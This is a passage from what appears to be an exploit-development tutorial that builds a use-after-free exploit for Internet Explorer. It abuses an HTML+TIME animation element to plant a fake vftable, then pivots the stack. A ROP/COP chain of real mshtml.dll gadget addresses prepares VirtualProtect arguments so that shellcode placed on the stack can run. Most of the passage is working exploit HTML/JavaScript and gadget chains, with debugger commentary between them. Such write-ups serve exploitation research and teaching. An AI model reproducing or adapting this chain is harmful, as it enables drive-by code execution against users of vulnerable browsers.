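function buildFakeTable(targetOffset, targetDword, fillerDword) {
  let table = "";
  for (let offset = 0; offset <= targetOffset; offset += 4) {
    table += packDword(offset === targetOffset ? targetDword : fillerDword);
  }
  return table;
}

// Read a DWORD back out of the string at a given byte offset.
function readDword(table, byteOffset) {
  const i = byteOffset / 2; // two bytes per code unit
  return (table.charCodeAt(i) | (table.charCodeAt(i + 1) << 16)) >>> 0;
}

const GADGET = 0x74c7a1ea; // xchg eax, esp ; ret (mshtml.dll), as used in the POC
const table = buildFakeTable(0x70, GADGET, 0x41414141);

console.log(packDword(GADGET) === "\ua1ea\u74c7");
console.log("0x" + readDword(table, 0x70).toString(16), "0x" + (table.length * 2).toString(16));
```

The resulting table is 0x74 bytes long (29 DWORDs), with the gadget sitting at offset 0x70, right where [eax+70h] will look for it.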

Let’s update our POC with this ROP gadget, in place of the former 42424242 DWORD that is in place of our fake virtual function.

<!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<meta><?IMPORT namespace="t" implementation="#default#time2"></meta>
  <script>

    window.onload = function() {

      // Create the fake vftable: 0x74 bytes (29 DWORDs, i.e. 29 "functions"), so the DWORD at offset 0x70 is one we control
      vftable = "\u4141\u4141";

      for (i=0; i < 0x70/4; i++)
      {
        // This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
        // which is now controlled by our own chunk
        if (i == 0x70/4-1)
        {
          vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
        }
        else
        {
          vftable+= unescape("\u4141\u4141");
        }
      }

      // This creates an array of strings that get pointers created to them by the values property of t:ANIMATECOLOR (so technically these will become an array of pointers to strings)
      // Just make sure that the strings are semicolon separated (the first element, which is our fake vftable, doesn't need to be prepended with a semicolon)
      // The first pointer in this array of pointers is a pointer to the fake vftable, constructed with the above for loops. Each ";vftable" string is prepended to the longer 0x70 byte fake vftable, which is the first pointer/DWORD
      for(i=0; i<25; i++)
      {
        vftable += ";vftable";
      }

      // Trigger the UAF
      var x  = document.getElementById("a");
      x.outerText = "";

      /*
      // Create a string that will eventually have 104 non-unicode bytes
      var fillAlloc = "\u4141\u4141";

      // Strings in JavaScript are in unicode
      // \u unescapes characters to make them non-unicode
      // Each string is also appended with a NULL byte
      // We already have 4 bytes from the fillAlloc definition. Appending 100 more bytes, 1 DWORD (4 bytes) at a time, compensating for the last NULL byte
      for (i=0; i < 100/4-1; i++)
      {
        fillAlloc += "\u4242\u4242";
      }

      // Create an array and add it as an element
      // https://www.corelan.be/index.php/2013/02/19/deps-precise-heap-spray-on-firefox-and-ie10/
      // DOM elements can be created with a property set to the payload
      var newElement = document.createElement('img');
      newElement.title = fillAlloc;
      */

      try {
        a = document.getElementById('anim');
        a.values = vftable;
      }
      catch (e) {};
    };

  </script>
    <table>
      <tr>
        <div>
          <span>
            <q id='a'>
              <a>
                <td></td>
              </a>
            </q>
          </span>
        </div>
      </tr>
    </table>
ss
</html>
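Each gadget address in the POC above is written as two \u escapes, low 16 bits first, because JavaScript strings hold 16-bit code units and x86 stores DWORDS in little-endian order. As a minimal sketch of that conversion (the helper name dwordToString is an assumption for illustration and is not part of the original POC):

```javascript
// Hypothetical helper (not part of the original POC): encode a 32-bit
// value as two 16-bit code units, low half first, so that it lands in
// memory as a little-endian DWORD.
function dwordToString(value) {
  var low = value & 0xffff;            // lower 16 bits, e.g. 0xa1ea
  var high = (value >>> 16) & 0xffff;  // upper 16 bits, e.g. 0x74c7
  return String.fromCharCode(low, high);
}

// The xchg eax, esp ; ret gadget address used in this post
var pivot = dwordToString(0x74c7a1ea);
```

Here pivot is the same two-character string as the "\ua1ea\u74c7" literal used in the POC.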

Let’s (for now) leave WinDbg configured as our postmortem debugger, and see what happens. Running the POC, we can see that the crash ensues, and the instruction pointer is pointing to 41414141.

Great! We can see that we have gained control over the stack by making our virtual function point to a ROP gadget that exchanges EAX with ESP! Recall earlier what was said about our fake vftable. Right now, this table is only 0x70 bytes in size, because we know our vftable from earlier indexed a function from offset 0x70. This doesn’t mean, however, we are limited to 0x70 total bytes. The only limitation we have is how much memory we can allocate to fill the chunk. Remember, this vftable is pointed to by the first of the 26 DWORDS allocated through the HTML+TIME method, for a total of 0x68 bytes (104 bytes in decimal), which is the size we need in order to control the freed allocation.

Knowing this, let’s add some “ROP” gadgets into our POC to outline this concept.

// Create the fake vftable: 0x70 bytes of filler, followed by the fake virtual function at offset 0x70
vftable = "\u4141\u4141";

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else
{
  vftable+= unescape("\u4141\u4141");
}
}

// Begin the ROP chain
rop = "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

Great! We can see that our crash still occurs properly, the instruction pointer is controlled, and we have added to our fake vftable, which is now located on the stack! In terms of exploitation strategy, notice there still remains a pointer on the stack that is our original xchg eax, esp instruction. Because of this, we will need to actually start our ROP chain after this pointer, since it already has been executed. This means that our ROP chain should start where the 43434343 bytes begin, and the 41414141 bytes can remain as padding/a jump further into the fake vftable.

It should be noted that from here on out, I had issues with setting breakpoints in WinDbg with Internet Explorer processes. This is because Internet Explorer forks many processes, depending on how many tabs you have, and our code, even when opened in the original Internet Explorer tab, will fork another Internet Explorer process. Because of this, we will just continue to use WinDbg as our postmortem debugger for the time being, making changes to our ROP chain and then viewing the state of the debugger to see our results. When necessary, we will start debugging the parent process of Internet Explorer and then use WinDbg to identify the correct child process and debug it in order to properly analyze our exploit.

We know that we need to change the rest of our fake vftable DWORDS with something that will eventually “jump” over our previously used xchg eax, esp ; ret gadget. To do this, let’s edit how we are constructing our fake vftable.

// Create the fake vftable: 0x70 bytes of gadgets, followed by the fake virtual function at offset 0x70
// Start the table with a ROP gadget that increases ESP (since this fake vftable is now on the stack, we need to jump over the first 0x70 bytes of "functions" to hit our ROP chain)
// Otherwise, the old xchg eax, esp ; ret stack pivot gadget will get re-executed
vftable = "\u07be\u74fb";                   // add esp, 0xC ; ret (74fb07be) (mshtml.dll)

for (i=0; i < 0x70/4; i++)
{
// This is where execution will reach when the fake vtable is indexed, because the use-after-free vulnerability is the result of a virtual function being fetched at [eax+0x70]
// which is now controlled by our own chunk
if (i == 0x70/4-1)
{
  vftable+= unescape("\ua1ea\u74c7");     // xchg eax, esp ; ret (74c7a1ea) (mshtml.dll) Get control of the stack
}
else if (i == 0x68/4-1)
{
  vftable += unescape("\u07be\u74fb");    // add esp, 0xC ; ret (74fb07be) (mshtml.dll) When execution reaches here, jump over the xchg eax, esp ; ret gadget and into the full ROP chain
}
else
{
  vftable+= unescape("\u7738\u7503");     // ret (75037738) (mshtml.dll) Keep performing returns to increment the stack, until the final add esp, 0xC ; ret is hit
}
}

// ROP chain
rop = "\u9090\u9090"; 					  // Padding for the previous ROP gadget (add esp, 0xC ; ret)

// Our ROP chain begins here
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";
rop += "\u4343\u4343";

// Combine everything
vftable += rop;

What we know so far is that this fake vftable will be loaded on the stack. When this happens, our original xchg eax, esp ; ret gadget will still be there, and we will need a way to make sure we don’t execute it again. The way we are going to do this is to replace our 41414141 bytes with several ret gadgets that lead to an eventual add esp, 0xC ; ret ROP gadget, which will jump over the xchg eax, esp ; ret gadget and into our final ROP chain!
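To make the layout easier to reason about, here is a small symbolic model of the table built by the loop above, meant to be run offline in any modern JavaScript engine rather than inside the POC. The names buildLayout and walk are assumptions for illustration, and gadget names stand in for the real addresses. It is only a sketch of how the returns chain together, not a debugger trace.

```javascript
// Symbolic model only: gadget names stand in for the real addresses.
var RET = "ret";
var ADD_ESP_C = "add esp, 0xC ; ret";
var PIVOT = "xchg eax, esp ; ret";

// Mirror the loop from the POC, one array entry per DWORD
function buildLayout() {
  var layout = [ADD_ESP_C];                     // offset 0x00
  for (var i = 0; i < 0x70 / 4; i++) {
    if (i === 0x70 / 4 - 1) {
      layout.push(PIVOT);                       // offset 0x70
    } else if (i === 0x68 / 4 - 1) {
      layout.push(ADD_ESP_C);                   // offset 0x68
    } else {
      layout.push(RET);
    }
  }
  layout.push("padding");                       // first DWORD of rop
  layout.push("start of ROP chain");            // second DWORD of rop
  return layout;
}

// Follow the returns the way the CPU would after the stack pivot
function walk(layout) {
  var esp = 0;                                  // index in DWORDs
  var executed = [];
  while (esp < layout.length) {
    var gadget = layout[esp];
    esp += 1;                                   // ret pops one DWORD
    executed.push(gadget);
    if (gadget === ADD_ESP_C) {
      esp += 3;                                 // add esp, 0xC skips three DWORDs
    } else if (gadget !== RET) {
      break;                                    // reached something other than the sled
    }
  }
  return executed;
}

var executed = walk(buildLayout());
```

In this model the last entry of executed is the start of the ROP chain, and the stack pivot gadget at offset 0x70 never appears in the list, which is the behavior we want.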

Rerunning the new POC shows us program execution has skipped over the virtual function table and into our ROP chain! I will go into detail about the ROP chain, but from here on out there is nothing special about this exploit. Just as previous blogs of mine have outlined, constructing a ROP chain is simply the same at this point. For getting started with ROP, please refer to these posts. This post will just walk through the ROP chain constructed for this exploit.

The first of the 8 43434343 DWORDS is in ESP, with the other 7 DWORDS located on the stack.

This is great news. From here, we just have a simple task of developing a 32-bit ROP chain! The first step is to get a stack address loaded into a register, so we can use it for RVA calculations. Note that although the stack changes addresses between each instance of a process (usually), this is not a result of ASLR; it is just a result of memory management.

Looking through mshtml.dll, we can see there are two great candidates to get a stack address into EAX and ECX.

push esp ; pop eax ; ret

mov ecx, eax ; call edx

Notice, however, the mov ecx, eax instruction ends in a call. We will first pop a gadget that “returns to the stack” into EDX. When the call occurs, a return address will get pushed onto the stack. To compensate for this, and so program execution doesn’t execute this return address, we simply can add to ESP to essentially “jump over” the return address. Here is what this block of the ROP chain looks like.

// Our ROP chain begins here
rop += "\ud937\u74e7";                     // push esp ; pop eax ; ret (74e7d937) (mshtml.dll) Get a stack address into a controllable register
rop += "\u9d55\u74c2";                     // pop edx ; ret (74c29d55) (mshtml.dll) Prepare EDX for COP gadget
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from previous COP gadget
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX, which contains a stack address, into ECX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9365\u750c";                     // add esp, 0x18 ; pop ebp ; ret (750c9365) (mshtml.dll) Jump over parameter placeholders into ROP chain

// Parameter placeholders
// The Import Address Table of mshtml.dll has a direct pointer to VirtualProtect 
// 74c21308  77e250ab kernel32!VirtualProtectStub
rop += "\u1308\u74c2";                     // kernel32!VirtualProtectStub IAT pointer
rop += "\u1111\u1111";                     // Fake return address placeholder
rop += "\u2222\u2222";                     // lpAddress (Shellcode address)
rop += "\u3333\u3333";                     // dwSize (Size of shellcode)
rop += "\u4444\u4444";                     // flNewProtect (PAGE_EXECUTE_READWRITE, 0x40)
rop += "\u5555\u5555";                     // lpflOldProtect (Any writable page)

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\u9090\u9090";                     // Compensate for pop ebp instruction from gadget that "jumps" over parameter placeholders
rop += "\u9090\u9090";                     // Start ROP chain
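The two padding DWORDS after the COP gadget can be sanity checked with a tiny symbolic stack model. This is only a sketch for offline use: the function name simulateCop is an assumption, and each array entry stands for one DWORD rather than a real address.

```javascript
// Symbolic model only: each array entry is one DWORD on the stack.
var stack = [
  "mov ecx, eax ; call edx",        // gadget that was just returned into
  "padding",
  "padding",
  "add esp, 0x18 ; pop ebp ; ret"   // gadget we want to run next
];

function simulateCop(stack) {
  var esp = 1;                      // ret already popped the COP gadget at index 0
  // call edx pushes a return address, moving ESP back by one DWORD
  esp -= 1;
  stack[esp] = "return address pushed by call";
  // EDX points to add esp, 0xC ; ret, which skips three DWORDs ...
  esp += 3;
  // ... and then returns into whatever ESP points to
  return stack[esp];
}

var nextGadget = simulateCop(stack);
```

The three skipped DWORDS are the pushed return address plus the two padding values, so nextGadget is the gadget that jumps over the parameter placeholders.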

After we get a stack address loaded into EAX and ECX, notice how we have constructed “parameter placeholders” for our eventual call to VirtualProtect, which will mark the stack as RWX, so we can execute our shellcode from there.

Recall that we have control of the stack, and everything within the rop variable is on the stack. We place the function call on the stack because we are performing this exploit on a 32-bit system. The Win32 API on 32-bit Windows, as you can recall, leverages the __stdcall calling convention, which passes function arguments on the stack. For more information on how this ROP method is constructed, you can refer to a previous blog I wrote, which outlines this method.
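As a rough illustration of that layout, the placeholders can be modeled as an ordered list of 4-byte slots. The names frame and slotOffset are assumptions made for this sketch, which is meant for offline calculation in a modern JavaScript engine and not for the POC itself.

```javascript
// Stack layout expected when returning into a __stdcall function:
// the function's address, then the return address, then the arguments.
var frame = [
  "VirtualProtect address",
  "return address",
  "lpAddress",
  "dwSize",
  "flNewProtect",
  "lpflOldProtect"
];

// Byte offset of a slot relative to the first slot (4 bytes per DWORD)
function slotOffset(name) {
  var index = frame.indexOf(name);
  if (index === -1) {
    throw new Error("unknown slot: " + name);
  }
  return index * 4;
}

var frameSize = frame.length * 4;                  // 0x18 bytes of placeholders
var lastArgOffset = slotOffset("lpflOldProtect");  // 0x14
```

The 0x18 byte total is why an add esp, 0x18 gadget is enough to jump over all six placeholders.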

After running the updated POC, we can see that we land on the 90909090 bytes, which is in the above POC marked as “Start ROP chain”, which is the last line of code. Let’s check a few things out to confirm we are getting expected behavior.

Our ROP chain starts out by saving ESP (at the time) into EAX. This value is then moved into ECX, meaning EAX and ECX both contain addresses that are very close to the stack in its current state. Let’s check the state of the registers, compared to the value of the stack.

As we can see, EAX and ECX contain the same address, and both of these addresses are part of the address space of the current stack! This is great, and we are now on our way. Our goal now will be to leverage the preserved stack addresses, place them in strategic registers, and leverage arbitrary write gadgets to overwrite the stack addresses containing the placeholders with our actual arguments.

As mentioned above, we know that Internet Explorer, when spawned, creates at least two processes. Since our exploit additionally forks another process from Internet Explorer, we are going to work backwards now. Let’s leverage Process Hacker in order to see the process tree when Internet Explorer is spawned.

The processes we have been looking at thus far are the child processes of the original Internet Explorer parent. Notice however, when we run our POC (which is not a complete exploit and still causes a crash), that a third Internet Explorer process is created, even though we are opening this file from the second Internet Explorer process.

This, thus far, has been unbeknownst to us, as we have been leveraging WinDbg in a postmortem fashion. However, we can get around this by simply waiting until the third process is created before attaching our debugger! Each time we have executed the script, we have had a prompt to ask us if we want to allow JavaScript. We will use this as a way to debug the correct process. First, open up Internet Explorer how you usually would. Secondly, before attaching your debugger, open the exploit script in Internet Explorer. Don’t click on “Click here for options…”.

This will create a third process, which will be the last process listed in WinDbg under “System order”.

Note that you do not need to leverage Process Hacker each time to identify the process. Open up the exploit, and don’t accept the prompt yet to execute JavaScript. Open WinDbg, and attach to the very last Internet Explorer process.

Now that we are debugging the correct process, we can actually set some breakpoints to verify everything is intact. Let’s set a breakpoint on the gadget that “jumps” over the parameter placeholders for our ROP chain and execute our POC.

Great! Stepping through the instruction(s), we then finally land into our 90909090 “ROP gadget”, which symbolizes where our “meaningful” ROP chain will start, and we can see we have “jumped” over the parameter placeholders!

From our current execution state, we know that ECX/EAX contain a value near the stack. The first parameter placeholder, which is an IAT entry that points to kernel32!VirtualProtectStub, is 0x18 bytes away from the value in ECX.

Our first goal will be to take this value, increase it by 0x18, and perform two dereference operations: first dereferencing the pointer on the stack to obtain the actual address of the IAT entry, and then dereferencing the IAT entry itself to get the address of kernel32!VirtualProtect. This can be seen below.

// Arbitrary write gadgets to change placeholders to valid function arguments
rop += "\udfee\u74e7";                     // add eax, 0x18 ; ret (74e7dfee) (mshtml.dll) EAX is 0x18 bytes away from the parameter placeholder for VirtualProtect
rop += "\udfbc\u74db";                     // mov ecx, eax ; call edx (74dbdfbc) (mshtml.dll) Place EAX into ECX (EDX still contains our COP gadget)
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the stack pointer offset containing the IAT entry for VirtualProtect
rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

The above snippet will take the preserved stack value in EAX and increase it by 0x18 bytes. This means EAX will now hold the stack address of the VirtualProtect parameter placeholder. This value is also copied into ECX by our previously used COP gadget. Then, EAX is dereferenced to load the value stored at that stack address (the address of the VirtualProtect IAT entry), and dereferenced again to load the actual address of VirtualProtect. Finally, since ECX still holds the stack address of the parameter placeholder, an arbitrary write gadget overwrites the placeholder with the actual address of VirtualProtect. Let’s set a breakpoint on the previously used add esp, 0x18 gadget used to jump over the parameter placeholders.
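The double dereference followed by the write can be pictured with a toy memory model. In the sketch below, the IAT entry and VirtualProtectStub values are the ones shown in the parameter placeholder comments earlier, while STACK_SLOT is a made-up address used purely for illustration.

```javascript
// Toy memory model: keys are addresses, values are the DWORD stored there.
var STACK_SLOT = 0x1000;           // hypothetical stack address of the placeholder
var IAT_ENTRY = 0x74c21308;        // mshtml.dll IAT entry shown in the post
var VIRTUAL_PROTECT = 0x77e250ab;  // kernel32!VirtualProtectStub shown in the post

var memory = {};
memory[STACK_SLOT] = IAT_ENTRY;
memory[IAT_ENTRY] = VIRTUAL_PROTECT;

var eax = STACK_SLOT;   // add eax, 0x18
var ecx = eax;          // mov ecx, eax ; call edx
eax = memory[eax];      // mov eax, dword [eax] -> address of the IAT entry
eax = memory[eax];      // mov eax, dword [eax] -> address of VirtualProtect
memory[ecx] = eax;      // mov dword [ecx], eax
```

After the last line, the placeholder slot holds the address of VirtualProtect instead of the address of the IAT entry.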

Executing the updated POC, we can see EAX now contains the stack address which points to the IAT entry to VirtualProtect.

Stepping through the COP gadget, which loads EAX into ECX, we can see that both registers contain the same value now.

Stepping through, we can see the stack address is dereferenced and placed in EAX, meaning there is now a pointer to VirtualProtect in EAX.

We can dereference the address in EAX again, which is an IAT pointer to VirtualProtect, to load the actual value in EAX. Then, we can overwrite the value on the stack that is our “placeholder” for the VirtualProtect function, using an arbitrary write gadget.

As we can see, the stack address in ECX, which used to point to the parameter placeholder, now points to the actual VirtualProtect address!

The next goal is the next parameter placeholder, which represents a “fake” return address. This return address needs to be the address of our shellcode. Recall that when a function call occurs, a return address is placed on the stack. This address is used by program execution to let the function know where to redirect execution after completing the call. We are leveraging this same concept here, because right after the page in memory that holds our shellcode is marked as RWX, we would like to jump straight to it to start executing.

Let’s first generate some shellcode and store it in a variable called shellcode. Let’s also make our ROP chain a static size of 0x500 bytes, or a total length of 320 (0x140) DWORDS.

rop += "\uf5c9\u74cb";                     // mov eax, dword [eax] ; ret (74cbf5c9) (mshtml.dll) Dereference the IAT entry to obtain a pointer to VirtualProtect
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for VirtualProtect

// Placeholder for the needed size of our ROP chains
for (i=0; i < 0x500/4 - 0x16; i++)
{
rop += "\u9090\u9090";
}

// Create a placeholder for our shellcode, roughly 0x400 bytes in size
shellcode = "\u9191\u9191";

for (i=0; i < 0x396/4-1; i++)
{
shellcode += "\u9191\u9191";
}

This will create several more addresses on the stack, which we can use to get our calculations in order. The rop variable is prototyped for 0x500 total bytes worth of gadgets. The for loop keeps track of each DWORD that has already been put on the stack, so the placeholder padding shrinks as more gadgets are used up. This means we can reliably calculate where our shellcode is on the stack without additional gadgets pushing the shellcode further and further down. The 0x16 in the for loop is the number of gadgets used so far, in hexadecimal, and every time we add gadgets we need to increase this number by how many were added. There are probably better ways to mathematically calculate this, but I am more focused on the concepts behind browser exploitation, not automation.
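One possible way to avoid the manual counter, sketched here under the assumption that the gadgets are kept in an array of DWORD values before being turned into a string, is to pad the array out to the reserved size automatically. The helper name padChain is hypothetical and the 0x43434343 entries are dummy values.

```javascript
// Hypothetical helper: pad an array of DWORDs out to a fixed byte size
function padChain(gadgets, totalBytes, filler) {
  var totalDwords = totalBytes / 4;
  if (gadgets.length > totalDwords) {
    throw new Error("chain is larger than the reserved size");
  }
  var padded = gadgets.slice();
  while (padded.length < totalDwords) {
    padded.push(filler);
  }
  return padded;
}

// 0x16 gadgets used so far, represented here by dummy values
var used = [];
for (var i = 0; i < 0x16; i++) {
  used.push(0x43434343);
}
var chain = padChain(used, 0x500, 0x90909090);
```

However many gadgets are added to used, chain stays 0x140 DWORDS long, so whatever follows it stays at the same offset.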

We know that our shellcode will begin where our 91919191 opcodes are. Eventually, we will prepend our final payload with a few NOPs, just to ensure stability. Now that we have our first argument in hand, let’s move on to the fake return address.

We know that the stack address containing the now real first argument for our ROP chain, the address of VirtualProtect, is in ECX. This means the address right after would be the parameter placeholder for our return address.

We can see that if we increase ECX by 4 bytes, we can get the stack address pointing to the return address placeholder into ECX. From there, we can place the location of the shellcode into EAX, and leverage our arbitrary write gadget to overwrite the placeholder parameter with the actual argument we would like to pass, which is the address of where the 91919191 bytes start (a.k.a our shellcode address).

We can leverage the following gadgets to increase ECX.

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the fake return address parameter placeholder

Don’t forget also to increase the variable used in our for loop previously by 4 to account for the 4 new ROP gadgets (for a total of 0x1a, or 26). It is expected from here on out that this number is increased to compensate for each additional gadget needed.

After increasing ECX, we can see that the parameter placeholder’s address for the return address is in ECX.

We also know that the distance between the value in ECX and where our shellcode starts is 0x4dc, or fffffb24 in its negative (two’s complement) representation. Recall that if we placed the value 0x4dc on the stack, it would translate to 0x000004dc, which contains NULL bytes, which would break our exploit. Instead, we leverage the negative representation of the value, which contains no NULL bytes, and we eventually will perform a negation operation on this value.
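The 0x4dc figure can be cross-checked with a little arithmetic. The sketch below assumes that the shellcode variable is appended directly after the 0x500 byte rop variable, which is not shown in the snippets above, and the variable names are for illustration only.

```javascript
var ROP_BYTES = 0x500;        // reserved size of the rop variable

// DWORDs in rop that come before the return address placeholder:
// 1 padding DWORD, 7 gadget/padding DWORDs, 1 VirtualProtect placeholder
var dwordsBefore = 1 + 7 + 1;
var placeholderOffset = dwordsBefore * 4;            // 0x24 bytes into rop

// Assumption: the shellcode starts immediately after rop
var distance = ROP_BYTES - placeholderOffset;        // 0x4dc
```

Under that assumption the result agrees with the distance observed in the debugger.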

So to start, let’s place the negative representation of the distance between the current value in ECX, which is the stack address that points to 11111111 (our parameter placeholder for the return address), and our shellcode location (91919191) into EAX.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative distance between the current value of ECX (which contains the fake return parameter placeholder on the stack) and the shellcode location into EAX 
rop += "\ufb24\uffff";                     // Negative distance described above (fffffb24)

From here, we will perform the negation operation on EAX, which will place the actual value of 0x4dc into EAX.

rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual distance to the shellcode into EAX
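The negation trick is plain 32-bit two’s complement arithmetic, and it can be checked offline before a value goes into the chain. The helper names negate32 and hasNullByte below are assumptions for this sketch and are not part of the POC.

```javascript
// 32-bit two's complement negation, the same operation as neg eax
function negate32(value) {
  return (-value) >>> 0;
}

// True if any of the four bytes of a 32-bit value is 0x00
function hasNullByte(value) {
  for (var shift = 0; shift < 32; shift += 8) {
    if (((value >>> shift) & 0xff) === 0) {
      return true;
    }
  }
  return false;
}

var encoded = negate32(0x4dc);       // 0xfffffb24
var decoded = negate32(encoded);     // back to 0x4dc
```

hasNullByte(0x4dc) is true while hasNullByte(encoded) is false, which is exactly why the negative form is the one placed on the stack.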

As mentioned above, we know we want to eventually get the stack address which points to our shellcode into EAX. To do so, we will need to actually add the distance to our shellcode to the address of our return parameter placeholder, which currently is only in ECX. There is a nice ROP gadget that can easily add to EAX in mshtml.dll.

add eax, ebx ; ret

In order to add to EAX, we first need to get the distance to our shellcode into EBX. To do this, there is a nice COP gadget available to us.

mov ebx, eax ; call edi

We first are going to start by preparing EDI with a ROP gadget that returns to the stack, as is common with COP.

rop += "\u4d3d\u74c2";                     // pop edi ; ret (74c24d3d) (mshtml.dll) Prepare EDI for a COP gadget 
rop += "\u07be\u74fb";                     // add esp, 0xC ; ret (74fb07be) (mshtml.dll) Return back to the stack and jump over the return address from previous COP gadget

After, let’s then store the distance to our shellcode into EBX, and compensate for the previous COP gadget’s return to the stack.

rop += "\uc0c8\u7512";                     // mov ebx, eax ; call edi (7512c0c8) (mshtml.dll) Place the distance to the shellcode into EBX
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget
rop += "\u9090\u9090";                     // Padding to compensate for previous COP gadget

We know ECX currently holds the address of the parameter placeholder for our return address, which was the base address used in our calculation for the distance between this placeholder and our shellcode. Let’s move that address into EAX.

rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the return address parameter placeholder stack address back into EAX

Let’s now step through these ROP gadgets in the debugger.

Execution hits the pop eax ; ret gadget first, and the negative distance to our shellcode is loaded into EAX.

After the return to the stack gadget is loaded into EDI, to prepare for the COP gadget, the distance to our shellcode is loaded into EBX. Then, the parameter placeholder address is loaded into EAX.

Since the address of the return address placeholder is in EAX, we can simply add the value of EBX, which is the distance from the return address placeholder to our shellcode, to EAX. This results in EAX holding the stack address that points to the beginning of our shellcode. Then, we can leverage the previously used arbitrary write gadget to overwrite what ECX currently points to, which is the return address parameter placeholder on the stack.

rop += "\u5a6c\u74ce";                     // add eax, ebx ; ret (74ce5a6c) (mshtml.dll) Place the address of the shellcode into EAX
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for the fake return address, with the address of the shellcode

We can see that the address of our shellcode is in EAX now.

Leveraging the arbitrary write gadget, we successfully overwrite the return address parameter placeholder on the stack with the actual argument, which is our shellcode!

Perfect! The next parameter, lpAddress, is also easy, as its parameter placeholder is located 4 bytes after the return address. Since we already have a great arbitrary write gadget, we can just increase the target location by 4 bytes, so that the address of the parameter placeholder for lpAddress is placed into ECX. Then, since the address of our shellcode is already in EAX, we can just reuse this!

rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpAddress parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpAddress, with the address of the shellcode

As we can see, we have now taken care of the lpAddress parameter.

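Next up is the size of our shellcode. We will be specifying 0x401 bytes for our shellcode, as this is more than enough for a shell. Conveniently, the negative representation of 0x401 (fffffbff) contains no NULL bytes, whereas that of 0x400 (fffffc00) would.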

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x401 in EAX
rop += "\ufbff\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual size of the shellcode in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the dwSize parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for dwSize, with the size of our shellcode

